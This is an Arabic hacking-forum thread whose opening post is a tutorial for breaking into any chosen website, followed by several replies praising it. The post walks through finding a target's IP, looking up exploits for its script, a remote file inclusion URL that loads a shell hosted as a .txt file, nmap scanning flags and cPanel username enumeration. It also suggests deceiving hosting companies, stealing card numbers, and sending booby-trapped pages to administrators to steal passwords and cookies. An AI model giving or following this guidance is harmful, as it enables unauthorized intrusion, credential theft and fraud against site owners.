1. صدام السقاف

    صدام السقاف ExpErt DeveloPer

    الأنتساب:
    ‏11 يونيو 2014
    المشاركات:
    252
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    [​IMG]



    أَلّصَلّأَة ؤُ أَلّسِلّأَمَ عٌلّى أشًرٌفّ أَلّمَرٌسِلّيّـنَ مًٍحًٍمدَ ِأبَِْنُ عًبدًٍالَِله اّلٍِْصًٍادًٍقً الًٍاْمْيٍنْ ...~

    أَلّحًمَدَ لّلّةً ؤُحًدَةً نَحًمَدَةً ؤُ نَشًڳُرٌةً ؤُ نَسِتِعٌيّنَةً ؤُ نَسِتِغُفّرٌةً ؤُ نَعٌؤُدَ بَأَلّلّةً مَنَ شًرٌؤُرٌ أنَفّسِنَأَ ؤُ مَنَ سِيّئأَتِ أعٌمَأَلّنَأَ ...~

    مَنَ يّهدَةً أَلّلّةً فّلّأَ مَظُلّ لّةً ؤُ مَنَ يّظُلّلّ فّلّنَ تِجًدَ لّةً ؤُلّيّأًَ مَرٌشًدَأَ ...~

    ؤُ أشًةًدَ ألّأَ إلّأَةً إلّأَ أَلّلّةً ؤُحًدَةً لّأَ شًرٌيّڳُ لّةً ؤُ أنَ مَحًمَدَأًَ عٌبَدَةً ؤُ رٌسِؤُلّةً صَلّى أَلّلّةً عٌلّيّةً ؤُ سِلّمَ ...~

    ؤُ عٌلّى آلّةً ؤُ صَحًبَةً أجًمَعٌيّنَ ؤُ مَنَ تِبَعٌةًمَ بَإحًسِأَنَ إلّى يّؤُمَ أَلّدَيّنَ ...~

    رٌبَنَأَ لّأَ عٌلّمَ لّنَأَ إلّأَ مَأَ عٌلّمَتِنَأَ إنَڳُ أنَتِ أَلّعٌلّيّمَ أَلّخّبَيّرٌ ...~

    رٌبَنَأَ لّأَ فّةًمَ لّنَأَ إلّأَ مَأَ فّةًمَتِنَأَ إنَڳُ أنَتِ أَلّجًؤُأَدَ أَلّڳُرٌيّمَ ...~

    رٌبَيّ أَشًرٌحً لّيّ صَدَرٌيّ ؤُ يّسِرٌ لّيّ أمَرٌيّ ؤُ أَحًلّلّ عٌقّدَة مَنَ لّسِأَنَيّ يّفّقّةًؤُأَ قّؤُلّيّ ...~

    أمَأَ بَعٌدَ ...~

    فّإنَ أصَدَقّ أَلّحًدَيّثٌ ڳُتِأَبَ أَلّلّةً تِعٌأَلّى ؤُ خّيّرٌ أَلّةًدَيّ ةًدَيُّ سِيّدَنَأَ مَحًمَدَ صَلّى أَلّلّةً عٌلّيّةً ؤُ سِلّمَ ...~

    ؤُ شًرٌ أَلّأمَؤُرٌ مَحًدَثٌأَتِةًأَ ؤُ ڳُلّ مَحًدَثٌة بَدَعٌة ؤُ ڳُلّ بَدَعٌة ضِلّأَلّة ؤُ ڳُلّ ضِلّأَلّة فّيّ أَلّنَأَرٌ ...~

    فّأَلّلّةًمَ أجًرٌنَأَ ؤُ قّنَأَ عٌذّأَبَةًأَ بَرٌحًمَتِڳُ يّأَ أرٌحًمَ أَلّرٌأَحًمَيّنَ ...~

    نبدأ على بركة الله :


    اولا اختار الموقع المطلوب اختراقه مثلا http://www.sitename.com/
    نشيل كلمة اسم الموقع ونحط اسم الموقع المراد اختراقه طيب حددنا هدفنا شوف معاي نجيب ثغره كيف اول حاجه نطالع اى بى الموقع طيب نطالعه كيف شوف معاي فى الصوره هذى طيب الامر هكذا:-
    انا جربت اطلع ايبي موقع قوقل

    [​IMG]

    نفتح الدوس و نكتب Ping http://www.sitename.com
    نشيل اسم الموقع و نحط اسم الموقع المراد اختراقه :
    تلاقي الايبي موجود بجانب عباره
    ping statistics for

    طيب نركن الابى و ندور جوه الموقع على حاجه زى كذا
    Powered by xxx
    الاكسات هذى اسم الاسكربت طيب ناخد الاسم و نطير على الميل ورم او السيكيورتى فوكس و نبحث عن ثغره له
    فلنفرض ان اسم الاسكربت
    jGallery
    نطير على الميلورم
    http://milw0rm.com/search

    الى مايعرف كيف يتعامل مع الميلورم هذا شرح بسيط من احد المنتديات
    احببت ان ارفقه بالدرس لكى اكون وضحت الشرح بشكل كبير



    نبدا

    1- واجهة الموقع

    [​IMG]

    2-مكان البحث

    [​IMG]


    مواقع اضافية لكشف الثغرات

    SecurityFocus
    اسم الموقع : سكيروتي فووكس
    العمل : اظهار آخر الثغرات مع المكتشف و الاستغلال

    --
    JaASCOIs.com: The Leading Ja ASCO is Site on the Net
    اسم الموقع : مدري والله اسمه غريب هههههه
    العمل : موقع عربي لاظهار أخطر الثغرات وحلها .

    --

    SecuriTeam.com - A Free Accurate and Independent Source of Vulnerability Information
    اسم الموقع : مجموعة الحماية
    العمل : اظهار أحدث الثغرات وتوجد به ثغرات منتدى فبلتن .

    --
    CXSECURITY.COM Free Security List
    اسم الموقغ : سكيورتي رايسوون
    العمل : يحتوي على آخر الدوال المصابه لتخطي حماية السيرفرات
    وبالنظر الى الأعلى ثم الضغط على Exploits فإنه يظهر لك آخر الثغرات مع المكتشف

    --

    www.milw0rm.com
    عاد هالموقع معرووف وما يحتاج كله ثغرات وكيرنلات الخ ..بس للأسف مغلق مدري وش السالفة

    --

    لمحبي اختراق السيرفرات

    http://www.kernel.org/

    موقع متخصص في الكيرنلات

    طيب بعد من دوس هيطلعلنا الثغره كده



    الاستغلال كالاتى
    http://المكان/ اللى فيه الاسكربت المصاب/الموقع المراد اختراقه/index.php?index.php?G_JGALL[inc_path]=http://.txt
    شل على هيئة txt
    طيب نفرض اننا مالاقينا الاسكربت مصاب صاحب الموقع مرقع كل الثغرات نلم العده و نرحل ولا كيف %:". لا يا سيدي لسا عندنا نفس
    نجيب الاى بى و نروح على
    Metasearch Search Engine - Search.com
    و نكتب زى اللى فى الصوره علشان نبحث عن جميع المواقع اللى على السيرفر و فيها كلمة
    Powered byملحوظه :-*مش كل المواقع اللى بتطلع بتكون على نفس السيرفر احيانا*


    طيب ظهر لنا مواقع كتيره على السيرفر و فيها اسكربتات واضحه نروح للميل ورم او احد المواقع البديله والشبيهه له و انشاء الله نلاقى لها ثغرات طيب لو ملقينا تابع
    طيب احنا مالقينا اسم الاسكربت زى ما انت قلت
    نشوف ملف مميز فى روابط الموقع او المواقع اللى على السيرفر و نعمل بحث عنه فى جوجل تلاقى مواقع كاتبه اسم الاسكربت
    جبت اسم الاسكربت و مالقيت ثغرات نادرا او ماعرفت اجيبه او مقفوله ثغراته مفيش الا حل واحد هوه ان انتا تدور يدوى على الثغرات
    بتقول لى كيف اقولك دور على ثغرة اسكل او اكس اس اس و شرح هذه الثغرات هنا فى الموقع
    طيب نفس القصه مش لاقي ولا حاجه
    نجرى على طول على موقع الاستضافه و نشوف مركب اسكربت ايش ؟
    وأذا ما تعرف مواقع للأستضافه اعطيك هذا يفيدك:Netcraft | Internet Research, Anti-Phishing and PCI Security Services



    بيطلع لنا كذا



    كله واضح الحمد لله
    طيب مالقينا اى حاجه تقدر تساعدنا لاختراق الموقع المراد طيب ندخل ثانى على النت كرافت و شوف معايا



    نجيب الثغرات من هذا الرابط
    http://www.****sploit.com:55555/
    شيل ال**** و ضع مكانها m e t a بدون مسافة
    ملحوظه: يجب انت تكون لديك خبره بالميتاسبلوت للتعامل مع هذا الموقع لان جميع ثغراته ميتا
    طيب لاقينا صاحب السيرفر ميه ميه مافي و لا ثغره عنده فى السيرفر
    هيا بنا%:" نشوف طريقه نجيب اى فاحص منافذ و ليكن
    Nmapللتحميل
    http://download.insecure.org/nmap/di...4.20-setup.exe
    Start ----> Run ----> CMD -----> NMAP
    وذلك لأنظمة تشغيل الويندوز
    بمجرد إدخال IP أو Domain Name فإن NMAP يحدد الهدف المطلوب فحصه و ل NMAP القدرة علي فحص أي مدي من الأيبيهات في نفس الوقت ولكن ذلك سيأخذ وقت كبير جدا لإظهار النتائج ويجب أن يلاحظ أن في عملية الفحص عموما ليس من الضروري والمنطقي القيام بفحص جميع البورتات لإنها عملية ستأخذ وقت كبير جدا
    عملية السكان و أوامر البرنامج في الحالات المختلفة وهي أوامر ليس لها علاقة بفحص البورتات أو نظام التشغيل
    الامر sL
    هو عبارة عن List Scan وبإستخدام فإن NMAP سيقوم بفحص الأي بي المحدد ولكن دون إرسال مجسات حقيقية و لكن النتائج في معظم الحالات إن لم تكن كلها تكون سلبية وهذا الأمر لا يمكن إستخدامه مع أوامر فحص البورتات و إكتشاف أنظمة التشغيل
    الامر sP
    هو عبارة عن Ping Scan الأمر مفيد إلي حد ما في عملية إسكتشاف الأجهزة العاملة في مدي أي بي معين أو المتصلة بسيرفر أو شبكة معينة
    بإستخدام هذا الأمر فإن البرنامج يرسل رسالة ICMP وهي تعني Internet Control Message Protocol حيث يتم التأكد من مدي إستجابة الجهاز من عدمه وعموما ودون الدخول في التفاصيل الخاصة بهذه الرسالة فإن هذه الأداة تستخدم في إستكشاف الأخطاء الموجودة بالشبكة ومدي تقبل إتصال خدمة معينة وهذه الرسالة تطلب إتصال TCP إلي البورت 80 وهو البورت المخصص لبروتوكول ال Http . و عملية ال Ping في حد ذاتها عملية مهمة جدا بالنسبة للشبكات ولكن إستخدامها بمفردها لن يؤدي لأي نتائج لأن أي فايروول سيرفض العملية من أساسها ولكن الأفضل هو إستخدام أمر Ping مع أوامر أخرى أكثر تعقيدا . وسيتم شرح ذلك.

    الأمر P0
    وهو يعني No Ping حيث لا يتم إستكشاف الأجهزة قبل البدء في عملية الفحص وهو أمر ضروري في حالات فحص البورتات و حالات فحص نوع نظام التشغيل مع ملاحظة أن و بإستخدام هذا الأمر فإن NMAP سيقوم بعملية الفحص بلا أي إسكتشاف ومعظم عمليات الفحص لا تتم بدون هذا الأمر

    الأمر Ps
    وهو يعني TCP SYN Ping وفيه يتم إرسال رسائل TCP فارغة في زمن محدد و ال TCP هو أحد بروتوكولات الإتصال ونقل البيانات بين الأجهزة داخل الشبكة أو عن طريق الإنترنت Transmission Control Protocol
    وذلك إلي بورت أو أكثر حيث يتم تحديد رقم البورتات بجانب الأمر و إذا تم تركه فارغا فسيتم إستخدام البورت 80 . هذه الرسلة التي سيتم إرسالها ستطلب الإتصال و بالطبع فالجهاز الآخر سيرفض الإتصال برسالة RST أو reset وذلك في حالة إذا كان البورت مغلق و هو غالبا ما يحدث ولكن في حالة وجود البورت مفتوح فإن الرد سيكون بقبول الإتصال برسالة تسمي SYN/ACK TCP و في النهاية فإن جهازك سيقوم بإرسال رسالة RST reset ولكن الهدف هنا هو إكتشاف ودراسة رد الفعل من الجهازالآخر وليس إجراء إتصال فقبول الإتصال معناه وجود خطأ يجب إصلاحه أو إستغلاله حسب الحاجة

    الأمر PA
    وهو يعني TCP ACK Ping ولاحظ الإختلاف بين هذا الأمر وا لأمر الذي قبله حيث في هذا الأمر يستبدل syn بACK وذلك لتعريف رسالة الإتصال من البداية
    ولاحظ أن إستخدام SYN أو ACK يزيد من فرصة التغلب علي الفايروول الخاص بالراوتر حيث يتم رفض الإتصالات بمجرد إرسال الرسائل الفارغة و كل فايروول له طريقته في التعامل مع مثل هذه الإتصالالت وهو ما سوف يتم شرحه في موضوع آخر

    الأمر PU

    يعني udp ping أي User Datagram Protocol و هو نوع آخر من أنواع الإتصال ونقل البيانات بين الأجهزة ولكن يتميز عن ال TCP بالسرعة حيث يتم إرسال رسائل قصيرة وسريعة في فترة وجيزة للغاية وبالطبع يتم تحديد البورت المراد إستخدامه بعد كتابة الأمر مباشرة ويمكن الإختيار من بين 65,535 بورت و بمجرد أن يتم إرسال من هذا النوع إلي الجهاز الآخر وعند وجود البورت مغلق فإنه يتم الرد برسال ICMP وبالتالي فإنه يتم إكتشاف أن الجهاز يعمل ومن الممكن إجراء سكان قوي عليه

    وهذه الأوامر هي معظم الأوامر التي تستخدم في عملية الإستكشاف لأي أي بي أو شبكة
    ومرة اخري فإن التدريب علي برنامج سيعلمك الكثير في أمور إستكشاف الشبكات و الأجهزة و إكتشاف الأخطاء
    وبعد ذلك سيتم إستكمال الأوامر الخاصة بإكتشاف البورتات و نظام التشغيل وكذلك البرامج والخدمات التي يمكنها الإتصال وذلك بالجهاز أو الشبكة الذي يجري عليه الفحص



    طيب بتقولى وش العمل الحين يعنى لو لاقيت بورتات مفتوحه و هذا اكيد عندك حاجه من الاثنين يا أما تحاول تدخل عليها بالطريقه هذى
    http://www.sitename.netort/
    ناخذ بورت و نحط رقم البورت و ناخذ اسم الموقع و نحط اسم الموقع المراد
    طيب ممكن ندخل من على الدوس و نعرف مثلا نوع الاف تى بى و ممكن نلاقيله ثغرات او عن طريق التلنت
    طيب مافي حاجه من اللى انت بتقولها جابت نتيجه وش العمل:{13}:؟
    تعالى اتعلم بعض الحيل
    اول حيله انك تروح لشركة الاستضافه اللى عليها الموقع و تقول لهم انك تبغاء تجرب الخدمه قبل ما تشترك عندهم بيدولك باس و يوزر اف تى بى و عيش و مش فعالة بقوه
    ثانيا ممكن تسرق فيزا و تشترك فى السيرفر و نفس الكلام اللى فوق
    ملحوظه سرقة الفيزات حرام شرعا و مرفوضه!!:{
    ثالثا ممكن لو معاك ملير تلغم صفحه و ترسلها الى الادمن يعنى و تخترق جهازه و تطلع الباسوردات اللى على جهازه او تاخد الكوكيز هذا لو انت مالقيت ثغرة اكس اس اس او تأخد اميله و ممكن تلاقى فيه الباس
    رابعا تجرب باس الايميل فى السى بانل طيب بتقولى انا ماعندي اليوزر تعال اوريك كيف تطلع اليوزر
    ندخل على الموقع المستهدف و بعد الرابط نكتب:

    cgi-sys/scgiwarp

    وبكذا تجيب اليوزر اعلم ان الطريقه صعبه على البعض ومستحيله على البعض
    ولكن هذا ما استطعت ان اقدمه لكم اخوانى في شبكه عراق تيم
    )4:"


    ~.. الى هناآ نصل الى ختام الموضوع ..~

    ~.. والحمدلله تعالى ..~
    ~.. والصلاة والسلام على حبيبه اشرف الخلق والمرسلين ابا القاسم محمد

    <اتمنى من صميم قلبي قد وافيت في شرحي واتمنى ان استفدوا منه >>

    للامانه االشرح منقول ولكن تم التعديل و الاضافه عليه بنسبه 65%

    أخوكم في ألله : )4:"صدآم حسين ألسقآف )4:"

    [​IMG]

     
    1 person likes this.
  2. Dr.MOT

    Dr.MOT Support - Iq-Team

    الأنتساب:
    ‏2 سبتمبر 2011
    المشاركات:
    650
    الإعجابات المتلقاة:
    5,463
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    IraQ
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::

    السلام عليكم ورحمة الله وبركاته

    ان كان للجمال موطن فمنك ينبع وينبع موضوعك يتقاطر جمالا من كل جانب

    فكم انت كبير ي صدام واصل ياعزيزي شهادتي فيك مجروحه

    آكيد يوشم بالوشم الخماسي [​IMG]

    دمت ودام عطائك

    وفقك الله لما يحب ويرضى
     
  3. TeePlow

    TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    400
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::

    السلام عليكم
    والله ابداع في ابداع ما اقدر اوصفه تسلم يا غالي على الشرح الاكثر من رائع
    :{1}::{1}:
    يوشم بالخماسي &:":
     
  4. صدام السقاف

    صدام السقاف ExpErt DeveloPer

    الأنتساب:
    ‏11 يونيو 2014
    المشاركات:
    252
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::


    ان كان للبسمه عنوان فعنوانها تواجدك بمواضيعي
    كلامك زادني حماس رغم انها بضعه حروف الا ان لها اثر كبير في نفسي

    فشكراً لمرورك ولتقييمك ولكلامك الرائع دمت كماء احببت ان تكون )4:"
     
  5. ɢᴇɴɴᴀʀᴏ x

    ɢᴇɴɴᴀʀᴏ x V • I • P

    الأنتساب:
    ‏25 مايو 2014
    المشاركات:
    490
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    18
    المخالفات
    6
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::

    وعليكم السلام ورحمة الله

    بسم الله ماشاء الله شرح اكثر من رائع

    يوشم بالخماسي الرمضاني

    لاتحرمنا من جديدك اخوي صدام


    .aًُoً..aًُoً.:{1}::{1}:.aًُoً..aًُoً.
     
  6. صدام السقاف

    صدام السقاف ExpErt DeveloPer

    الأنتساب:
    ‏11 يونيو 2014
    المشاركات:
    252
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::


    ياهلا وغلا وكرتون حلا ارحب يالغالى شكراً على كلامك وتقييمك ومرورك الرائع

    اسعدني تواجدك في موضوعي المتواضع ^_^
     
  7. صدام السقاف

    صدام السقاف ExpErt DeveloPer

    الأنتساب:
    ‏11 يونيو 2014
    المشاركات:
    252
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::


    شكراً لمرورك اخي الكريم محمود وتسلم على الوشم الرائع!!:{

    اسعدني تواجدك اخى الكريم
     
  8. Gaza-Dz

    Gaza-Dz Support - Iq-Team

    الأنتساب:
    ‏26 مايو 2013
    المشاركات:
    1,827
    الإعجابات المتلقاة:
    97
    نقاط الجائزة:
    48
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:
    DZ
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::

    السلام عليكم و رحمة الله تعالي وبركاته
    تسلم يا غالي على الشرح الاكثر من رائع
    والله ابداع في ابداع
    وشم بالخمس نجوم + لايك
     
  9. &الكنك&

    &الكنك& V • I • P

    الأنتساب:
    ‏27 أغسطس 2012
    المشاركات:
    354
    الإعجابات المتلقاة:
    29
    نقاط الجائزة:
    28
    الوظيفة:
    ملازم في الجيش العراقي
    الإقامة:
    العراق
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::

    ما شاء الله عليك شرح بل تفصيل الممل


    يوشم بل ذهبي


    &:":​
     
  10. علي القناص

    علي القناص <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏6 مارس 2014
    المشاركات:
    359
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    رد: {حصري} ::|| أختراق أي موقع او منتدي تريده ||::

    عليكم السلام و رحمة الله و بركاته
    عاشت الأيادي اخ صدام من صدك ابداع في ابداع
    وجاري التقييم والوشم الخماسي
     

مشاركة هذه الصفحة